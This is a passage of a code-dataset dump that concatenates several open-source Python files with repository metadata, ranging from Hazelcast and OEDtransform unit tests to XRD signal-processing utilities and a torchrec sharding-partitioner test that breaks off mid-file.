] | 727 | 2015-07-13T20:32:55.000Z | 2022-03-31T11:55:34.000Z | steam/enums/base.py | tjensen/steam | 061ca33842c9ec5aa7c0866d20cbeed0759d5ea5 | [
"MIT"
] | 335 | 2015-07-22T12:28:35.000Z | 2022-02-24T11:53:12.000Z | steam/enums/base.py | tjensen/steam | 061ca33842c9ec5aa7c0866d20cbeed0759d5ea5 | [
"MIT"
] | 155 | 2015-07-22T08:53:19.000Z | 2022-03-30T10:59:22.000Z | from enum import IntEnum
class SteamIntEnum(IntEnum):
    pass
| 10.833333 | 28 | 0.753846 | 8 | 65 | 6.125 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 65 | 5 | 29 | 13 | 0.942308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
71871e0292e1d8b802fe63c2ba6b5ae65d4c0b43 | 47 | py | Python | lofti_gaiaDR2/__init__.py | Sam-2727/lofti_gaiaDR2 | 02ec58cb51ea7569b702800f508b42ea9d38b6a7 | [
"BSD-3-Clause"
] | null | null | null | lofti_gaiaDR2/__init__.py | Sam-2727/lofti_gaiaDR2 | 02ec58cb51ea7569b702800f508b42ea9d38b6a7 | [
"BSD-3-Clause"
] | null | null | null | lofti_gaiaDR2/__init__.py | Sam-2727/lofti_gaiaDR2 | 02ec58cb51ea7569b702800f508b42ea9d38b6a7 | [
"BSD-3-Clause"
] | null | null | null | from .lofti import *
from .loftitools import *
| 15.666667 | 25 | 0.744681 | 6 | 47 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 26 | 23.5 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e0d1b295fde3d2e37f133fdb10dee9c9a476d7bf | 1,627 | py | Python | tests/unit/proxy/cp/cp_proxy_manager_test.py | tonytheonlypony/hazelcast-python-client | 3aafeaf2ebc05aee4f2386c62c079db496a7c81f | [
"Apache-2.0"
] | 98 | 2015-12-08T14:26:27.000Z | 2022-03-23T17:44:11.000Z | tests/unit/proxy/cp/cp_proxy_manager_test.py | tonytheonlypony/hazelcast-python-client | 3aafeaf2ebc05aee4f2386c62c079db496a7c81f | [
"Apache-2.0"
] | 396 | 2016-02-23T11:07:55.000Z | 2022-03-31T14:26:34.000Z | tests/unit/proxy/cp/cp_proxy_manager_test.py | tonytheonlypony/hazelcast-python-client | 3aafeaf2ebc05aee4f2386c62c079db496a7c81f | [
"Apache-2.0"
] | 62 | 2015-12-09T11:20:53.000Z | 2022-01-28T01:30:54.000Z | import unittest
from hazelcast.cp import _without_default_group_name, _get_object_name_for_proxy
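# These tests pin down the CP group-name helpers: the '@default' suffix is stripped case-insensitively,
# the reserved METADATA group and names with more than one '@' are rejected, and empty proxy or object
# names trip assertions.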
class CPProxyManagerTest(unittest.TestCase):
    def test_without_default_group_name(self):
        self.assertEqual("test", _without_default_group_name("test@default"))
        self.assertEqual("test", _without_default_group_name("test@DEFAULT"))
        self.assertEqual("test@custom", _without_default_group_name("test@custom"))
    def test_without_default_group_name_with_multiple_group_names(self):
        with self.assertRaises(AssertionError):
            _without_default_group_name("test@default@@default")
    def test_without_default_group_name_with_metadata_group_name(self):
        with self.assertRaises(AssertionError):
            _without_default_group_name("test@METADATA")
        with self.assertRaises(AssertionError):
            _without_default_group_name("test@metadata")
    def test_get_object_name_for_proxy(self):
        self.assertEqual("test", _get_object_name_for_proxy("test@default"))
        self.assertEqual("test", _get_object_name_for_proxy("test@custom"))
    def test_get_object_name_for_proxy_empty_object_name(self):
        with self.assertRaises(AssertionError):
            _get_object_name_for_proxy("@default")
        with self.assertRaises(AssertionError):
            _get_object_name_for_proxy(" @default")
    def test_get_object_name_for_proxy_empty_proxy_name(self):
        with self.assertRaises(AssertionError):
            _get_object_name_for_proxy("test@")
        with self.assertRaises(AssertionError):
            _get_object_name_for_proxy("test@ ")
| 40.675 | 83 | 0.744929 | 197 | 1,627 | 5.624365 | 0.142132 | 0.08935 | 0.17148 | 0.207581 | 0.844765 | 0.795126 | 0.758123 | 0.67148 | 0.611913 | 0.532491 | 0 | 0 | 0.16595 | 1,627 | 39 | 84 | 41.717949 | 0.816507 | 0 | 0 | 0.392857 | 0 | 0 | 0.098955 | 0.012907 | 0 | 0 | 0 | 0 | 0.428571 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.321429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1cdc5158ed6a2d1184788efd4464973510c51b48 | 1,378 | py | Python | XRDXRFutils/utils.py | zpreisler/XRDXRFutils | 9455c8394e82d8b62c7423a072bcbc6a13db1eb2 | [
"MIT"
] | null | null | null | XRDXRFutils/utils.py | zpreisler/XRDXRFutils | 9455c8394e82d8b62c7423a072bcbc6a13db1eb2 | [
"MIT"
] | 3 | 2022-03-08T10:25:39.000Z | 2022-03-30T10:47:28.000Z | XRDXRFutils/utils.py | zpreisler/XRDXRFutils | 9455c8394e82d8b62c7423a072bcbc6a13db1eb2 | [
"MIT"
] | null | null | null | from numpy import minimum,fft,pad
from scipy.signal import windows
def snip(z,m):
x = z.copy()
for p in range(1,m)[::-1]:
a1 = x[p:-p]
a2 = (x[:(-2 * p)] + x[(2 * p):]) * 0.5
x[p:-p] = minimum(a2,a1)
return x
def convolve(z,n=21,std=3):
kernel = windows.gaussian(2 * n - 1,std)
y_pad = pad(z,(n,n),'edge')
f = fft.rfft(y_pad)
w = fft.rfft(kernel,y_pad.shape[-1])
y = fft.irfft(w * f)
return y[n * 2:] / sum(kernel)
def snip2d(z,m):
x = z.copy()
for p in range(1,m)[::-1]:
a1 = x[:,p:-p]
a2 = (x[:,:(-2 * p)] + x[:,(2 * p):]) * 0.5
x[:,p:-p] = minimum(a2,a1)
return x
def convolve2d(z,n=21,std=3):
kernel = windows.gaussian(2 * n - 1,std)
y_pad = pad(z,((0,0),(0,0),(n,n)),'edge')
f = fft.rfft(y_pad)
w = fft.rfft(kernel,y_pad.shape[-1])
y = fft.irfft(w * f)
return y[:,n * 2:] / sum(kernel)
def snip3d(z,m):
x = z.copy()
for p in range(1,m)[::-1]:
a1 = x[:,:,p:-p]
a2 = (x[:,:,:(-2 * p)] + x[:,:,(2 * p):]) * 0.5
x[:,:,p:-p] = minimum(a2,a1)
return x
def convolve3d(z,n=21,std=3):
kernel = windows.gaussian(2 * n - 1,std)
y_pad = pad(z,((0,0),(0,0),(n,n)),'edge')
f = fft.rfft(y_pad)
w = fft.rfft(kernel,y_pad.shape[-1])
y = fft.irfft(w * f)
return y[:,:,n * 2:] / sum(kernel)
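# Editorial sketch (not part of the original XRDXRFutils/utils.py): snip() is an
# iterative SNIP-style baseline estimate -- at each half-width p it replaces every
# interior point with the minimum of itself and the mean of its neighbours p channels
# away, so broad background survives while narrow peaks are clipped off -- and
# convolve() smooths a spectrum with a normalised Gaussian kernel via rfft, using
# edge padding to limit boundary artefacts. A minimal demonstration on a synthetic
# 1-D spectrum (a narrow peak on a linear ramp), assuming only numpy as imported above:
if __name__ == "__main__":
    from numpy import arange, exp

    spectrum = exp(-0.5 * ((arange(1024) - 500.0) / 5.0) ** 2) + 0.001 * arange(1024)
    background = snip(spectrum, 24)              # baseline: ramp kept, narrow peak clipped away
    net_peak = spectrum - background             # peak with the background largely removed
    smoothed = convolve(spectrum, n=21, std=3)   # Gaussian-smoothed copy (same length here)
    print(net_peak.max(), smoothed.shape)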
| 20.878788 | 55 | 0.472424 | 259 | 1,378 | 2.478764 | 0.173745 | 0.056075 | 0.028037 | 0.018692 | 0.839564 | 0.839564 | 0.839564 | 0.839564 | 0.839564 | 0.839564 | 0 | 0.063126 | 0.275762 | 1,378 | 65 | 56 | 21.2 | 0.58016 | 0 | 0 | 0.522727 | 0 | 0 | 0.008708 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0 | 0.045455 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1cec17f8e4df0441d775d8b108bf5f7cb115fd1c | 140 | py | Python | vegaapiclient/generated/vega/snapshot/v1/__init__.py | vegaprotocol/sdk-python | 2491f62704afd806a47cb8467a7edf0dd65bbf1b | [
"MIT"
] | 1 | 2022-01-10T01:20:21.000Z | 2022-01-10T01:20:21.000Z | vegaapiclient/generated/vega/snapshot/v1/__init__.py | vegaprotocol/sdk-python | 2491f62704afd806a47cb8467a7edf0dd65bbf1b | [
"MIT"
] | 8 | 2021-10-01T12:54:27.000Z | 2022-03-24T12:22:40.000Z | vegaapiclient/generated/vega/snapshot/v1/__init__.py | vegaprotocol/sdk-python | 2491f62704afd806a47cb8467a7edf0dd65bbf1b | [
"MIT"
] | null | null | null | from . import snapshot_pb2_grpc as snapshot_grpc
from . import snapshot_pb2 as snapshot
__all__ = [
"snapshot_grpc",
"snapshot",
]
| 17.5 | 48 | 0.728571 | 18 | 140 | 5.166667 | 0.388889 | 0.215054 | 0.387097 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017699 | 0.192857 | 140 | 7 | 49 | 20 | 0.80531 | 0 | 0 | 0 | 0 | 0 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
1c15fd4eed9557a7866a22680e8f03270cbc0a57 | 9,903 | py | Python | tests/runner/test_string_manipulations.py | OasisLMF/OEDtransform | 688a9cf90a7f11ee19f5f48fcbe1cb93962ea67d | [
"BSD-3-Clause"
] | 1 | 2022-03-18T14:53:27.000Z | 2022-03-18T14:53:27.000Z | tests/runner/test_string_manipulations.py | OasisLMF/OpenDataTransform | 688a9cf90a7f11ee19f5f48fcbe1cb93962ea67d | [
"BSD-3-Clause"
] | 25 | 2021-08-05T16:17:24.000Z | 2022-03-29T16:28:35.000Z | tests/runner/test_string_manipulations.py | OasisLMF/OEDtransform | 688a9cf90a7f11ee19f5f48fcbe1cb93962ea67d | [
"BSD-3-Clause"
] | 1 | 2022-01-21T14:39:20.000Z | 2022-01-21T14:39:20.000Z | from hypothesis import given, settings
from converter.config import Config
from converter.mapping.base import ColumnConversion, TransformationEntry
from converter.types.notset import NotSet
from ..connector.fakes import FakeConnector
from ..mapping.fakes import make_simple_mapping
from .stategies import runners
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_replace(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="replace(a, 'oo', 'aa')",
)
],
"d": [
TransformationEntry(
transformation=(
r"replace(a + ' ' + b, re'oo (.)', '\1\1')"
),
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "faa a", "d": "faa fbb"},
{"c": "far a", "d": "far a far b"},
{"c": "baa a", "d": "baa bbb"},
{"c": "bar a", "d": "bar a bar b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_replace_on_non_lookup(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="replace('foo', 'oo', 'aa')",
)
],
"d": [
TransformationEntry(
transformation=(r"replace('foo, bee', re'o{2}', 'aa')"),
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "faa", "d": "faa, bee"},
{"c": "faa", "d": "faa, bee"},
{"c": "faa", "d": "faa, bee"},
{"c": "faa", "d": "faa, bee"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_replace_with_multiple_pairs(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="""
replace(
a + ' ' + b,
'foo', 'faa',
'boo', 'bam'
)
""",
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "faa a faa b"},
{"c": "far a far b"},
{"c": "bam a bam b"},
{"c": "bar a bar b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_when_contains_match(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "oo a", "b": "oo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="a",
when="match(a, 'foo a')",
)
],
"d": [
TransformationEntry(
transformation="a + ' ' + b",
when="match(a, re'oo.*')",
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "foo a", "d": NotSet},
{"c": NotSet, "d": "oo a oo b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_when_contains_match_on_non_lookup(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="a",
when="match('foo', 'foo')",
)
],
"d": [
TransformationEntry(
transformation="a + ' ' + b",
when="match('foo a', re'.*oo.*')",
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "foo a", "d": "foo a foo b"},
{"c": "far a", "d": "far a far b"},
{"c": "boo a", "d": "boo a boo b"},
{"c": "bar a", "d": "bar a bar b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_when_contains_search(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="a",
when="search(a, 'far')",
)
],
"d": [
TransformationEntry(
transformation="a + ' ' + b",
when=r"search(a + ' ' + b, re'a\s\w+oo')",
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": NotSet, "d": "foo a foo b"},
{"c": "far a", "d": NotSet},
{"c": NotSet, "d": "boo a boo b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_when_contains_search_on_non_lookup(runner_class):
input_data = [
{"a": "foo a", "b": "foo b"},
{"a": "far a", "b": "far b"},
{"a": "boo a", "b": "boo b"},
{"a": "bar a", "b": "bar b"},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="a",
when="search('a foo b', 'foo')",
)
],
"d": [
TransformationEntry(
transformation="a + ' ' + b",
when=r"search('foo a bar', re'oo.\w')",
)
],
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "foo a", "d": "foo a foo b"},
{"c": "far a", "d": "far a far b"},
{"c": "boo a", "d": "boo a boo b"},
{"c": "bar a", "d": "bar a bar b"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_join_of_lookups_str_and_non_str(runner_class):
input_data = [
{"a": "foo a", "b": 1},
{"a": "far a", "b": 2},
{"a": "boo a", "b": 3},
{"a": "bar a", "b": 4},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="join(', ', 'bar', a, 5, b, 0)",
)
],
},
types={"b": ColumnConversion(type="int")},
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "bar, foo a, 5, 1, 0"},
{"c": "bar, far a, 5, 2, 0"},
{"c": "bar, boo a, 5, 3, 0"},
{"c": "bar, bar a, 5, 4, 0"},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_join_of_nothing(runner_class):
input_data = [
{"a": "foo a", "b": 1},
{"a": "far a", "b": 2},
{"a": "boo a", "b": 3},
{"a": "bar a", "b": 4},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="join(', ')",
)
]
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": ""},
{"c": ""},
{"c": ""},
{"c": ""},
]
@given(runner_class=runners())
@settings(deadline=None)
def test_transform_contains_join_of_single_element(runner_class):
input_data = [
{"a": "foo a", "b": 1},
{"a": "far a", "b": 2},
{"a": "boo a", "b": 3},
{"a": "bar a", "b": 4},
]
mapping = make_simple_mapping(
{
"c": [
TransformationEntry(
transformation="join(', ', a)",
)
]
}
)
extractor = FakeConnector(data=input_data)
loader = FakeConnector()
runner_class(Config()).run(extractor, mapping, loader)
assert list(loader.data) == [
{"c": "foo a"},
{"c": "far a"},
{"c": "boo a"},
{"c": "bar a"},
]
| 25.789063 | 76 | 0.44017 | 1,031 | 9,903 | 4.106693 | 0.080504 | 0.022201 | 0.044166 | 0.054322 | 0.871752 | 0.867974 | 0.86136 | 0.816958 | 0.794757 | 0.787671 | 0 | 0.004683 | 0.374735 | 9,903 | 383 | 77 | 25.856397 | 0.679102 | 0 | 0 | 0.595016 | 0 | 0 | 0.152984 | 0 | 0 | 0 | 0 | 0 | 0.031153 | 1 | 0.031153 | false | 0 | 0.021807 | 0 | 0.05296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1c1814b5a74e0313eb5ba98a15453e36d07aa496 | 19,936 | py | Python | torchrec/distributed/planner/tests/test_partitioners.py | xing-liu/torchrec | 82ffde7a69fdb9c66b79a753d6f03afa5db3f73e | [
"BSD-3-Clause"
] | null | null | null | torchrec/distributed/planner/tests/test_partitioners.py | xing-liu/torchrec | 82ffde7a69fdb9c66b79a753d6f03afa5db3f73e | [
"BSD-3-Clause"
] | null | null | null | torchrec/distributed/planner/tests/test_partitioners.py | xing-liu/torchrec | 82ffde7a69fdb9c66b79a753d6f03afa5db3f73e | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import copy
import unittest
from typing import cast, List
from torch import nn
from torchrec.distributed.embedding_types import EmbeddingComputeKernel
from torchrec.distributed.embeddingbag import EmbeddingBagCollectionSharder
from torchrec.distributed.planner.enumerators import EmbeddingEnumerator
from torchrec.distributed.planner.partitioners import GreedyPerfPartitioner
from torchrec.distributed.planner.types import (
ParameterConstraints,
PartitionByType,
PlannerError,
Storage,
Topology,
)
from torchrec.distributed.test_utils.test_model import TestSparseNN
from torchrec.distributed.types import ModuleSharder, ShardingType
from torchrec.modules.embedding_configs import EmbeddingBagConfig
class RWSharder(EmbeddingBagCollectionSharder, ModuleSharder[nn.Module]):
def sharding_types(self, compute_device_type: str) -> List[str]:
return [ShardingType.ROW_WISE.value]
def compute_kernels(
self, sharding_type: str, compute_device_type: str
) -> List[str]:
return [EmbeddingComputeKernel.DENSE.value]
class TWSharder(EmbeddingBagCollectionSharder, ModuleSharder[nn.Module]):
def sharding_types(self, compute_device_type: str) -> List[str]:
return [ShardingType.TABLE_WISE.value]
def compute_kernels(
self, sharding_type: str, compute_device_type: str
) -> List[str]:
return [EmbeddingComputeKernel.DENSE.value]
class TWRWSharder(EmbeddingBagCollectionSharder, ModuleSharder[nn.Module]):
def sharding_types(self, compute_device_type: str) -> List[str]:
return [ShardingType.TABLE_ROW_WISE.value]
def compute_kernels(
self, sharding_type: str, compute_device_type: str
) -> List[str]:
return [EmbeddingComputeKernel.DENSE.value]
class TWCWSharder(EmbeddingBagCollectionSharder, ModuleSharder[nn.Module]):
def sharding_types(self, compute_device_type: str) -> List[str]:
return [ShardingType.TABLE_COLUMN_WISE.value]
def compute_kernels(
self, sharding_type: str, compute_device_type: str
) -> List[str]:
return [EmbeddingComputeKernel.DENSE.value]
class HostLevelSharder(EmbeddingBagCollectionSharder, ModuleSharder[nn.Module]):
def sharding_types(self, compute_device_type: str) -> List[str]:
return [ShardingType.TABLE_ROW_WISE.value, ShardingType.TABLE_COLUMN_WISE.value]
def compute_kernels(
self, sharding_type: str, compute_device_type: str
) -> List[str]:
return [EmbeddingComputeKernel.DENSE.value]
class TestGreedyPerfPartitioner(unittest.TestCase):
def setUp(self) -> None:
compute_device = "cuda"
self.topology = Topology(world_size=2, compute_device=compute_device)
tables = [
EmbeddingBagConfig(
num_embeddings=100 + i,
embedding_dim=10 + i,
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.topology = Topology(world_size=2, compute_device=compute_device)
self.model = TestSparseNN(tables=tables, weighted_tables=[])
self.enumerator = EmbeddingEnumerator(topology=self.topology)
self.partitioner = GreedyPerfPartitioner()
def test_tw_balanced_perf_device(self) -> None:
sharding_options = self.enumerator.enumerate(
module=self.model, sharders=[TWSharder()]
)
for sharding_option in sharding_options:
sharding_option.shards[0].perf = 100
sharding_option.shards[0].storage = Storage(hbm=1000, ddr=1000)
candidate_topology = copy.deepcopy(self.topology)
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=candidate_topology,
)
# pyre-ignore [16]
solution_topology = self.partitioner._topology
expected_ranks = {
"table_0": [0],
"table_1": [1],
"table_2": [0],
"table_3": [1],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
self.assertEqual(solution_topology.devices[0].perf, 200)
self.assertEqual(solution_topology.devices[1].perf, 200)
self.assertEqual(
solution_topology.devices[0].storage,
self.topology.devices[0].storage - Storage(2000, 2000),
)
self.assertEqual(
solution_topology.devices[1].storage,
self.topology.devices[1].storage - Storage(2000, 2000),
)
def test_tw_unbalanced_perf_device(self) -> None:
sharding_options = self.enumerator.enumerate(
module=self.model, sharders=[TWSharder()]
)
for i, sharding_option in enumerate(sharding_options):
perf = 100 if i > 0 else 300
sharding_option.shards[0].perf = perf
sharding_option.shards[0].storage = Storage(hbm=1000, ddr=1000)
candidate_topology = copy.deepcopy(self.topology)
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=candidate_topology,
)
# pyre-ignore[16]
solution_topology = self.partitioner._topology
expected_ranks = {
"table_0": [0],
"table_1": [1],
"table_2": [1],
"table_3": [1],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
self.assertEqual(solution_topology.devices[0].perf, 300)
self.assertEqual(solution_topology.devices[1].perf, 300)
self.assertEqual(
solution_topology.devices[0].storage,
self.topology.devices[0].storage - Storage(1000, 1000),
)
self.assertEqual(
solution_topology.devices[1].storage,
self.topology.devices[1].storage - Storage(3000, 3000),
)
def test_tw_balanced_perf_host(self) -> None:
self.topology = Topology(
world_size=16, local_world_size=8, compute_device="cuda"
)
tables = [
EmbeddingBagConfig(
num_embeddings=64,
embedding_dim=10 + i,
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables, weighted_tables=[])
self.enumerator = EmbeddingEnumerator(topology=self.topology)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model, sharders=[TWRWSharder()]
)
for sharding_option in sharding_options:
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(hbm=1000, ddr=1000)
sharding_option.partition_by = PartitionByType.HOST.value
candidate_topology = copy.deepcopy(self.topology)
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=candidate_topology,
)
# pyre-ignore[16]
solution_topology = self.partitioner._topology
expected_ranks = {
"table_0": [0, 1, 2, 3, 4, 5, 6, 7],
"table_1": [8, 9, 10, 11, 12, 13, 14, 15],
"table_2": [0, 1, 2, 3, 4, 5, 6, 7],
"table_3": [8, 9, 10, 11, 12, 13, 14, 15],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
for i in range(self.topology.world_size):
self.assertEqual(
solution_topology.devices[i].storage,
# there are two shards allocated to each device
self.topology.devices[i].storage - Storage(2000, 2000),
)
self.assertEqual(solution_topology.devices[i].perf, 200)
def test_rw_unbalanced_perf_uniform(self) -> None:
self.topology = Topology(world_size=4, compute_device="cuda")
tables = [
EmbeddingBagConfig(
num_embeddings=64,
embedding_dim=10 + i,
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables, weighted_tables=[])
self.enumerator = EmbeddingEnumerator(topology=self.topology)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model, sharders=[RWSharder()]
)
for sharding_option in sharding_options:
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(hbm=1000, ddr=1000)
sharding_option.partition_by = PartitionByType.UNIFORM.value
candidate_topology = copy.deepcopy(self.topology)
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=candidate_topology,
)
# pyre-ignore[16]
solution_topology = self.partitioner._topology
expected_ranks = {
"table_0": [0, 1, 2, 3],
"table_1": [0, 1, 2, 3],
"table_2": [0, 1, 2, 3],
"table_3": [0, 1, 2, 3],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
for i in range(self.topology.world_size):
self.assertEqual(
solution_topology.devices[i].storage,
self.topology.devices[i].storage - Storage(4000, 4000),
)
def test_twcw_unbalanced_perf_host(self) -> None:
self.topology = Topology(
world_size=16, local_world_size=8, compute_device="cuda"
)
constraints = {
"table_0": ParameterConstraints(min_partition=2),
"table_1": ParameterConstraints(min_partition=10),
"table_2": ParameterConstraints(min_partition=5),
"table_3": ParameterConstraints(min_partition=8),
}
tables = [
EmbeddingBagConfig(
num_embeddings=64,
embedding_dim=20 * (i + 1),
name="table_" + str(i),
feature_names=["feature_" + str(i)],
)
for i in range(4)
]
self.model = TestSparseNN(tables=tables)
self.enumerator = EmbeddingEnumerator(
topology=self.topology, constraints=constraints
)
self.partitioner = GreedyPerfPartitioner()
sharding_options = self.enumerator.enumerate(
module=self.model,
sharders=[TWCWSharder()],
)
for sharding_option in sharding_options:
perf = 100.0
for shard in sharding_option.shards:
shard.perf = perf
shard.storage = Storage(hbm=1000, ddr=1000)
sharding_option.partition_by = PartitionByType.HOST.value
sharding_plan = self.partitioner.partition(
proposal=sharding_options,
storage_constraint=self.topology,
)
expected_ranks = {
"table_0": [8, 9, 10, 11, 12, 13, 14, 15, 8, 9],
"table_1": [4, 5, 6, 7],
"table_2": [0, 1, 2, 3, 4, 5, 6, 7, 0, 1, 2, 3],
"table_3": [10, 11, 12, 13, 14, 15, 8, 9, 10, 11],
}
ranks = {
sharding_option.name: [shard.rank for shard in sharding_option.shards]
for sharding_option in sharding_plan
}
self.assertEqual(expected_ranks, ranks)
def test_twrw_and_twcw_perf_host(self) -> None:
self.topology = Topology(
world_size=16, local_world_size=8, compute_device="cuda"
)
constraints = {
"table_0": ParameterConstraints(
sharding_types=[ShardingType.TABLE_ROW_WISE.value]
),
"table_1": ParameterConstraints(
